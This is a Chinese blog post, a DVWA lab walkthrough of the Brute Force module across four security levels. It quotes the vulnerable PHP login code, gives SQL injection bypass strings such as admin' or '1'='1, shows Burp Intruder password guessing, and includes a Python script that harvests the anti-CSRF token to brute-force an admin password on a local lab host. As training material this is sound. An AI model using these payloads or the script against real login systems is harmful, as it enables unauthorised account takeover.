<!DOCTYPE html>
<html lang=zh>
<head><meta name="generator" content="Hexo 3.8.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="前言Brute Force，即暴力（破解），是指黑客利用密码字典，使用穷举法猜解出用户口令，是现在最为广泛使用的攻击手法之一，如2014年轰动全国的12306“撞库”事件，实质就是暴力破解攻击。 Low核心代码&amp;lt;?php  if( isset( $_GET[ &amp;#39;Login&amp;#39; ] ) ) {     // Get username     $user = $_GET[ &amp;#39">
<meta name="keywords" content="渗透测试,DVWA">
<meta property="og:type" content="article">
<meta property="og:title" content="DVWA之Brute Force">
<meta property="og:url" content="http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/index.html">
<meta property="og:site_name" content="忆时光">
<meta property="og:description" content="前言Brute Force，即暴力（破解），是指黑客利用密码字典，使用穷举法猜解出用户口令，是现在最为广泛使用的攻击手法之一，如2014年轰动全国的12306“撞库”事件，实质就是暴力破解攻击。 Low核心代码&amp;lt;?php  if( isset( $_GET[ &amp;#39;Login&amp;#39; ] ) ) {     // Get username     $user = $_GET[ &amp;#39">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/Force1.jpg">
<meta property="og:image" content="http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/Force1.jpg">
<meta property="og:image" content="http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/Force2.jpg">
<meta property="og:image" content="http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/Force4.jpg">
<meta property="og:image" content="http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/Force3.jpg">
<meta property="og:image" content="http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/Force5.jpg">
<meta property="og:image" content="http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/Force6.jpg">
<meta property="og:image" content="http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/Force7.jpg">
<meta property="og:image" content="http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/Force8.jpg">
<meta property="og:image" content="http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/Force9.jpg">
<meta property="og:updated_time" content="2019-08-28T14:19:53.491Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="DVWA之Brute Force">
<meta name="twitter:description" content="前言Brute Force，即暴力（破解），是指黑客利用密码字典，使用穷举法猜解出用户口令，是现在最为广泛使用的攻击手法之一，如2014年轰动全国的12306“撞库”事件，实质就是暴力破解攻击。 Low核心代码&amp;lt;?php  if( isset( $_GET[ &amp;#39;Login&amp;#39; ] ) ) {     // Get username     $user = $_GET[ &amp;#39">
<meta name="twitter:image" content="http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/Force1.jpg">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>DVWA之Brute Force</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    <!-- rss -->
    
    
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Inici</a></li>
         
          <li><a href="/about/">Qui som</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/projects_url">Projectes</a></li>
        
      </ul>
    </span>
    <br>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2019/04/14/dvwa-zhi-command-injection/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2019/04/08/wen-jian-shang-chuan-er-zhi-shi-zhan-pian/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Post Anterior</span>
      <span id="i-next" class="info" style="display:none;">Post Següent</span>
      <span id="i-top" class="info" style="display:none;">Adalt</span>
      <span id="i-share" class="info" style="display:none;">Compartir Post</span>
    </span>
    <br>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/&text=DVWA之Brute Force"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/&title=DVWA之Brute Force"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/&is_video=false&description=DVWA之Brute Force"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=DVWA之Brute Force&body=Check out this article: http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/&title=DVWA之Brute Force"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/&title=DVWA之Brute Force"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/&title=DVWA之Brute Force"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/&title=DVWA之Brute Force"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/&name=DVWA之Brute Force&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/&t=DVWA之Brute Force"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Low"><span class="toc-number">2.</span> <span class="toc-text">Low</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#核心代码"><span class="toc-number">2.1.</span> <span class="toc-text">核心代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞利用"><span class="toc-number">2.2.</span> <span class="toc-text">漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#方法一：Burpsuite爆破"><span class="toc-number">2.2.1.</span> <span class="toc-text">方法一：Burpsuite爆破</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL注入"><span class="toc-number">2.2.2.</span> <span class="toc-text">SQL注入</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Medium"><span class="toc-number">3.</span> <span class="toc-text">Medium</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#核心代码-1"><span class="toc-number">3.1.</span> <span class="toc-text">核心代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞利用-1"><span class="toc-number">3.2.</span> <span class="toc-text">漏洞利用</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#High"><span class="toc-number">4.</span> <span class="toc-text">High</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#核心代码-2"><span class="toc-number">4.1.</span> <span class="toc-text">核心代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞利用-2"><span class="toc-number">4.2.</span> <span class="toc-text">漏洞利用</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Impossible"><span class="toc-number">5.</span> <span class="toc-text">Impossible</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#核心代码-3"><span class="toc-number">5.1.</span> <span class="toc-text">核心代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#关于PDO："><span class="toc-number">5.2.</span> <span class="toc-text">关于PDO：</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope="" itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        DVWA之Brute Force
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
        <span itemprop="name">ca5tle</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2019-04-13T02:18:11.000Z" itemprop="datePublished">2019-04-13</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/Web/">Web</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/DVWA/">DVWA</a>, <a class="tag-link" href="/tags/渗透测试/">渗透测试</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>Brute Force，即暴力（破解），是指黑客利用密码字典，使用穷举法猜解出用户口令，是现在最为广泛使用的攻击手法之一，如2014年轰动全国的12306“撞库”事件，实质就是暴力破解攻击。<br><img src="/2019/04/13/dvwa-zhi-brute-force/Force1.jpg" alt=""></p>
<h1 id="Low"><a href="#Low" class="headerlink" title="Low"></a>Low</h1><h2 id="核心代码"><a href="#核心代码" class="headerlink" title="核心代码"></a>核心代码</h2><pre><code>&lt;?php

if( isset( $_GET[ &#39;Login&#39; ] ) ) {
    // Get username
    $user = $_GET[ &#39;username&#39; ];

    // Get password
    $pass = $_GET[ &#39;password&#39; ];
    $pass = md5( $pass );

    // Check the database
    $query  = &quot;SELECT * FROM `users` WHERE user = &#39;$user&#39; AND password = &#39;$pass&#39;;&quot;;
    $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;],  $query ) or die( &#39;&lt;pre&gt;&#39; . ((is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_error($GLOBALS[&quot;___mysqli_ston&quot;]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . &#39;&lt;/pre&gt;&#39; );

    if( $result &amp;&amp; mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row[&quot;avatar&quot;];

        // Login successful
        echo &quot;&lt;p&gt;Welcome to the password protected area {$user}&lt;/p&gt;&quot;;
        echo &quot;&lt;img src=\&quot;{$avatar}\&quot; /&gt;&quot;;
    }
    else {
        // Login failed
        echo &quot;&lt;pre&gt;&lt;br /&gt;Username and/or password incorrect.&lt;/pre&gt;&quot;;
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]))) ? false : $___mysqli_res);
}

?&gt; 
</code></pre><p><code>isset</code>函数在php中用来检测变量是否设置，该函数返回的是布尔类型的值，即<code>true/false</code><br>可以看到，服务器只是验证了参数<code>Login</code>是否被设置，没有任何的防爆破机制，且对参数<code>username</code>、<code>password</code>没有做任何过滤，存在明显的sql注入漏洞。</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="方法一：Burpsuite爆破"><a href="#方法一：Burpsuite爆破" class="headerlink" title="方法一：Burpsuite爆破"></a>方法一：Burpsuite爆破</h3><ul>
<li>抓包<br><img src="/2019/04/13/dvwa-zhi-brute-force/Force1.jpg" alt=""></li>
<li>Send to Intruder<br><img src="/2019/04/13/dvwa-zhi-brute-force/Force2.jpg" alt=""></li>
<li>对password参数进行爆破<br><img src="/2019/04/13/dvwa-zhi-brute-force/Force4.jpg" alt=""></li>
<li><p>选中Payloads，载入字典，点击Start attack进行爆破<br><img src="/2019/04/13/dvwa-zhi-brute-force/Force3.jpg" alt=""></p>
<p>可以看到password的响应包长度（length）“与众不同”，可推测password为正确密码，手工验证登陆成功。</p>
<h3 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h3></li>
</ul>
<ol>
<li>username：admin’ or ‘1’=’1<br>password：(空)<br><img src="/2019/04/13/dvwa-zhi-brute-force/Force5.jpg" alt="">  </li>
<li>username：admin’ #<br>password：(空)<br><img src="/2019/04/13/dvwa-zhi-brute-force/Force6.jpg" alt=""></li>
</ol>
<h1 id="Medium"><a href="#Medium" class="headerlink" title="Medium"></a>Medium</h1><h2 id="核心代码-1"><a href="#核心代码-1" class="headerlink" title="核心代码"></a>核心代码</h2><pre><code>&lt;?php

if( isset( $_GET[ &#39;Login&#39; ] ) ) {
    // Sanitise username input
    $user = $_GET[ &#39;username&#39; ];
    $user = ((isset($GLOBALS[&quot;___mysqli_ston&quot;]) &amp;&amp; is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_real_escape_string($GLOBALS[&quot;___mysqli_ston&quot;],  $user ) : ((trigger_error(&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;, E_USER_ERROR)) ? &quot;&quot; : &quot;&quot;));

    // Sanitise password input
    $pass = $_GET[ &#39;password&#39; ];
    $pass = ((isset($GLOBALS[&quot;___mysqli_ston&quot;]) &amp;&amp; is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_real_escape_string($GLOBALS[&quot;___mysqli_ston&quot;],  $pass ) : ((trigger_error(&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;, E_USER_ERROR)) ? &quot;&quot; : &quot;&quot;));
    $pass = md5( $pass );

    // Check the database
    $query  = &quot;SELECT * FROM `users` WHERE user = &#39;$user&#39; AND password = &#39;$pass&#39;;&quot;;
    $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;],  $query ) or die( &#39;&lt;pre&gt;&#39; . ((is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_error($GLOBALS[&quot;___mysqli_ston&quot;]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . &#39;&lt;/pre&gt;&#39; );

    if( $result &amp;&amp; mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row[&quot;avatar&quot;];

        // Login successful
        echo &quot;&lt;p&gt;Welcome to the password protected area {$user}&lt;/p&gt;&quot;;
        echo &quot;&lt;img src=\&quot;{$avatar}\&quot; /&gt;&quot;;
    }
    else {
        // Login failed
        sleep( 2 );
        echo &quot;&lt;pre&gt;&lt;br /&gt;Username and/or password incorrect.&lt;/pre&gt;&quot;;
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]))) ? false : $___mysqli_res);
}

?&gt; 
</code></pre><p>相比Low级别的代码，Medium级别的代码主要增加了mysql_real_escape_string函数，这个函数会对字符串中的特殊符号（x00，n，r，，’，”，x1a）进行转义，基本上能够抵御sql注入攻击，说基本上是因为查到说 MySQL5.5.37以下版本如果设置编码为GBK，能够构造编码绕过mysql_real_escape_string 对单引号的转义（因实验环境的MySQL版本较新，所以并未做相应验证）；同时，$pass做了MD5校验，杜绝了通过参数password进行sql注入的可能性。但是，依然没有加入有效的防爆破机制。</p>
<p>具体的mysql_real_escape_string函数绕过问题详见：<br><a href="http://blog.csdn.net/hornedreaper1988/article/details/43520257" target="_blank" rel="noopener">http://blog.csdn.net/hornedreaper1988/article/details/43520257</a></p>
<p><a href="http://www.cnblogs.com/Safe3/archive/2008/08/22/1274095.html" target="_blank" rel="noopener">http://www.cnblogs.com/Safe3/archive/2008/08/22/1274095.html</a></p>
<h2 id="漏洞利用-1"><a href="#漏洞利用-1" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>虽然sql注入不再有效，但依然可以使用Burpsuite进行爆破，与Low级别的爆破方法基本一样，这里就不赘述了。</p>
<h1 id="High"><a href="#High" class="headerlink" title="High"></a>High</h1><h2 id="核心代码-2"><a href="#核心代码-2" class="headerlink" title="核心代码"></a>核心代码</h2><pre><code>&lt;?php

if( isset( $_GET[ &#39;Login&#39; ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ &#39;user_token&#39; ], $_SESSION[ &#39;session_token&#39; ], &#39;index.php&#39; );

    // Sanitise username input
    $user = $_GET[ &#39;username&#39; ];
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS[&quot;___mysqli_ston&quot;]) &amp;&amp; is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_real_escape_string($GLOBALS[&quot;___mysqli_ston&quot;],  $user ) : ((trigger_error(&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;, E_USER_ERROR)) ? &quot;&quot; : &quot;&quot;));

    // Sanitise password input
    $pass = $_GET[ &#39;password&#39; ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS[&quot;___mysqli_ston&quot;]) &amp;&amp; is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_real_escape_string($GLOBALS[&quot;___mysqli_ston&quot;],  $pass ) : ((trigger_error(&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;, E_USER_ERROR)) ? &quot;&quot; : &quot;&quot;));
    $pass = md5( $pass );

    // Check database
    $query  = &quot;SELECT * FROM `users` WHERE user = &#39;$user&#39; AND password = &#39;$pass&#39;;&quot;;
    $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;],  $query ) or die( &#39;&lt;pre&gt;&#39; . ((is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_error($GLOBALS[&quot;___mysqli_ston&quot;]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . &#39;&lt;/pre&gt;&#39; );

    if( $result &amp;&amp; mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row[&quot;avatar&quot;];

        // Login successful
        echo &quot;&lt;p&gt;Welcome to the password protected area {$user}&lt;/p&gt;&quot;;
        echo &quot;&lt;img src=\&quot;{$avatar}\&quot; /&gt;&quot;;
    }
    else {
        // Login failed
        sleep( rand( 0, 3 ) );
        echo &quot;&lt;pre&gt;&lt;br /&gt;Username and/or password incorrect.&lt;/pre&gt;&quot;;
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?&gt; 
</code></pre><p>High级别的代码加入了Token，可以抵御CSRF攻击，同时也增加了爆破的难度，通过抓包，可以看到，登录验证时提交了四个参数：<code>username</code>、<code>password</code>、<code>Login</code>以及<code>user_token</code>。<br><img src="/2019/04/13/dvwa-zhi-brute-force/Force7.jpg" alt=""></p>
<p>每次服务器返回的登陆页面中都会包含一个随机的user_token的值，用户每次登录时都要将user_token一起提交。服务器收到请求后，会优先做token的检查，再进行sql查询。<br><img src="/2019/04/13/dvwa-zhi-brute-force/Force8.jpg" alt=""><br>同时，High级别的代码中，使用了stripslashes（去除字符串中的反斜线字符,如果有两个连续的反斜线,则只去掉一个）、 mysql_real_escape_string对参数username、password进行过滤、转义，进一步抵御sql注入。</p>
<h2 id="漏洞利用-2"><a href="#漏洞利用-2" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>由于加入了<code>Anti-CSRFtoken</code>预防无脑爆破，这里就不推荐用Burpsuite了，还是简单用python写个脚本吧。<br>下面是我找的的一个脚本（python 2.7），用户名为<code>admin</code>，对<code>password</code>参数进行爆破并打印结果，仅供各位参考。</p>
<pre><code>from bs4 import BeautifulSoup
import urllib2
header={        &#39;Host&#39;: &#39;192.168.153.130&#39;,
        &#39;Cache-Control&#39;: &#39;max-age=0&#39;,
        &#39;If-None-Match&#39;: &quot;307-52156c6a290c0&quot;,
        &#39;If-Modified-Since&#39;: &#39;Mon, 05 Oct 2015 07:51:07 GMT&#39;,
        &#39;User-Agent&#39;: &#39;Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36&#39;,
        &#39;Accept&#39;: &#39;*/*&#39;,
        &#39;Referer&#39;: &#39;http://192.168.153.130/dvwa/vulnerabilities/brute/index.php&#39;,
        &#39;Accept-Encoding&#39;: &#39;gzip, deflate, sdch&#39;,
        &#39;Accept-Language&#39;: &#39;zh-CN,zh;q=0.8&#39;,
        &#39;Cookie&#39;: &#39;security=high; PHPSESSID=5re92j36t4f2k1gvnqdf958bi2&#39;}
requrl = &quot;http://192.168.153.130/dvwa/vulnerabilities/brute/&quot;

def get_token(requrl,header):
    req = urllib2.Request(url=requrl,headers=header)
    response = urllib2.urlopen(req)
    print response.getcode(),
    the_page = response.read()
    print len(the_page)
    soup = BeautifulSoup(the_page,&quot;html.parser&quot;)
    user_token = soup.form.input.input.input.input[&quot;value&quot;] #get the user_token
    return user_token

user_token = get_token(requrl,header)
i=0
for line in open(&quot;rkolin.txt&quot;):
    requrl = &quot;http://192.168.153.130/dvwa/vulnerabilities/brute/&quot;+&quot;?username=admin&amp;password=&quot;+line.strip()+&quot;&amp;Login=Login&amp;user_token=&quot;+user_token
    i = i+1
    print i,&#39;admin&#39;,line.strip(),
    user_token = get_token(requrl,header)
    if (i == 10):
        break
</code></pre><p>get_token的功能是通过python的BeautifulSoup库从html页面中抓取user_token的值，为了方便展示，这里设置只尝试10次。</p>
<h1 id="Impossible"><a href="#Impossible" class="headerlink" title="Impossible"></a>Impossible</h1><h2 id="核心代码-3"><a href="#核心代码-3" class="headerlink" title="核心代码"></a>核心代码</h2><pre><code>&lt;?php

if( isset( $_POST[ &#39;Login&#39; ] ) &amp;&amp; isset ($_POST[&#39;username&#39;]) &amp;&amp; isset ($_POST[&#39;password&#39;]) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ &#39;user_token&#39; ], $_SESSION[ &#39;session_token&#39; ], &#39;index.php&#39; );

    // Sanitise username input
    $user = $_POST[ &#39;username&#39; ];
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS[&quot;___mysqli_ston&quot;]) &amp;&amp; is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_real_escape_string($GLOBALS[&quot;___mysqli_ston&quot;],  $user ) : ((trigger_error(&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;, E_USER_ERROR)) ? &quot;&quot; : &quot;&quot;));

    // Sanitise password input
    $pass = $_POST[ &#39;password&#39; ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS[&quot;___mysqli_ston&quot;]) &amp;&amp; is_object($GLOBALS[&quot;___mysqli_ston&quot;])) ? mysqli_real_escape_string($GLOBALS[&quot;___mysqli_ston&quot;],  $pass ) : ((trigger_error(&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;, E_USER_ERROR)) ? &quot;&quot; : &quot;&quot;));
    $pass = md5( $pass );

    // Default values
    $total_failed_login = 3;
    $lockout_time       = 15;
    $account_locked     = false;

    // Check the database (Check user information)
    $data = $db-&gt;prepare( &#39;SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;&#39; );
    $data-&gt;bindParam( &#39;:user&#39;, $user, PDO::PARAM_STR );
    $data-&gt;execute();
    $row = $data-&gt;fetch();

    // Check to see if the user has been locked out.
    if( ( $data-&gt;rowCount() == 1 ) &amp;&amp; ( $row[ &#39;failed_login&#39; ] &gt;= $total_failed_login ) )  {
        // User locked out.  Note, using this method would allow for user enumeration!
        //echo &quot;&lt;pre&gt;&lt;br /&gt;This account has been locked due to too many incorrect logins.&lt;/pre&gt;&quot;;

        // Calculate when the user would be allowed to login again
        $last_login = strtotime( $row[ &#39;last_login&#39; ] );
        $timeout    = $last_login + ($lockout_time * 60);
        $timenow    = time();

        /*
        print &quot;The last login was: &quot; . date (&quot;h:i:s&quot;, $last_login) . &quot;&lt;br /&gt;&quot;;
        print &quot;The timenow is: &quot; . date (&quot;h:i:s&quot;, $timenow) . &quot;&lt;br /&gt;&quot;;
        print &quot;The timeout is: &quot; . date (&quot;h:i:s&quot;, $timeout) . &quot;&lt;br /&gt;&quot;;
        */

        // Check to see if enough time has passed, if it hasn&#39;t locked the account
        if( $timenow &lt; $timeout ) {
            $account_locked = true;
            // print &quot;The account is locked&lt;br /&gt;&quot;;
        }
    }

    // Check the database (if username matches the password)
    $data = $db-&gt;prepare( &#39;SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;&#39; );
    $data-&gt;bindParam( &#39;:user&#39;, $user, PDO::PARAM_STR);
    $data-&gt;bindParam( &#39;:password&#39;, $pass, PDO::PARAM_STR );
    $data-&gt;execute();
    $row = $data-&gt;fetch();

    // If its a valid login...
    if( ( $data-&gt;rowCount() == 1 ) &amp;&amp; ( $account_locked == false ) ) {
        // Get users details
        $avatar       = $row[ &#39;avatar&#39; ];
        $failed_login = $row[ &#39;failed_login&#39; ];
        $last_login   = $row[ &#39;last_login&#39; ];

        // Login successful
        echo &quot;&lt;p&gt;Welcome to the password protected area &lt;em&gt;{$user}&lt;/em&gt;&lt;/p&gt;&quot;;
        echo &quot;&lt;img src=\&quot;{$avatar}\&quot; /&gt;&quot;;

        // Had the account been locked out since last login?
        if( $failed_login &gt;= $total_failed_login ) {
            echo &quot;&lt;p&gt;&lt;em&gt;Warning&lt;/em&gt;: Someone might of been brute forcing your account.&lt;/p&gt;&quot;;
            echo &quot;&lt;p&gt;Number of login attempts: &lt;em&gt;{$failed_login}&lt;/em&gt;.&lt;br /&gt;Last login attempt was at: &lt;em&gt;${last_login}&lt;/em&gt;.&lt;/p&gt;&quot;;
        }

        // Reset bad login count
        $data = $db-&gt;prepare( &#39;UPDATE users SET failed_login = &quot;0&quot; WHERE user = (:user) LIMIT 1;&#39; );
        $data-&gt;bindParam( &#39;:user&#39;, $user, PDO::PARAM_STR );
        $data-&gt;execute();
    } else {
        // Login failed
        sleep( rand( 2, 4 ) );

        // Give the user some feedback
        echo &quot;&lt;pre&gt;&lt;br /&gt;Username and/or password incorrect.&lt;br /&gt;&lt;br/&gt;Alternative, the account has been locked because of too many failed logins.&lt;br /&gt;If this is the case, &lt;em&gt;please try again in {$lockout_time} minutes&lt;/em&gt;.&lt;/pre&gt;&quot;;

        // Update bad login count
        $data = $db-&gt;prepare( &#39;UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;&#39; );
        $data-&gt;bindParam( &#39;:user&#39;, $user, PDO::PARAM_STR );
        $data-&gt;execute();
    }

    // Set the last login time
    $data = $db-&gt;prepare( &#39;UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;&#39; );
    $data-&gt;bindParam( &#39;:user&#39;, $user, PDO::PARAM_STR );
    $data-&gt;execute();
}

// Generate Anti-CSRF token
generateSessionToken();

?&gt; 
</code></pre><p>可以看到Impossible级别的代码加入了可靠的防爆破机制，当检测到频繁的错误登录后，系统会将账户锁定，爆破也就无法继续。<br><img src="/2019/04/13/dvwa-zhi-brute-force/Force9.jpg" alt=""><br>同时采用了更为安全的PDO（PHP Data Object）机制防御sql注入，这是因为不能使用PDO扩展本身执行任何数据库操作，而sql注入的关键就是通过破坏sql语句结构执行恶意的sql命令。</p>
<h2 id="关于PDO："><a href="#关于PDO：" class="headerlink" title="关于PDO："></a>关于PDO：</h2><p><a href="http://www.cnblogs.com/pinocchioatbeijing/archive/2012/03/20/2407869.html" target="_blank" rel="noopener">http://www.cnblogs.com/pinocchioatbeijing/archive/2012/03/20/2407869.html</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Inici</a></li>
         
          <li><a href="/about/">Qui som</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/projects_url">Projectes</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
